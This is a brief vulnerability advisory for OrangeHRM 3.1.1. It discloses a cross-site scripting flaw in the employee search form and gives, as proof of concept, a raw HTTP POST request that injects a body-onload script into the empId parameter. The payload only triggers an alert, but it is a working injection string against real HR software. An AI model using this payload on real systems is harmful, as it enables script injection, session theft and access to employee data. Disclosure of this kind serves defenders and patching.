OrangeHRM version 3.1.1 suffers from a cross site scripting vulnerability.
3b65169d1d14ac1150889cf5e9994426d9e97b2dd4c7b3c770c4c4ba5cb3fced
# ==============================================================
# Title ...| XSS vulnerability in OrangeHRM
# Version .| OrangeHRM 3.1.1
# Date ....| 28.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.orangehrm.com
# ==============================================================
[+] from admin user:
# ==============================================================
# XSS
---<request>---
POST /k/cms/orange/orangehrm-3.1.1/symfony/web/index.php/pim/viewEmployeeList HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 418
empsearch%5Bemployee_name%5D%5BempName%5D=asdasd&empsearch%5Bemployee_name%5D%5BempId%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&empsearch%5Bid%5D=&empsearch%5Bemployee_status%5D=0&empsearch%5Btermination%5D=1&empsearch%5Bsupervisor_name%5D=asdasd&empsearch%5Bjob_title%5D=0&empsearch%5Bsub_unit%5D=0&empsearch%5BisSubmitted%5D=yes&empsearch%5B_csrf_token%5D=109e14ec2ad65dc3a8eaa4bf8c28582a&pageNo=&hdnAction=search
---<request>---
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/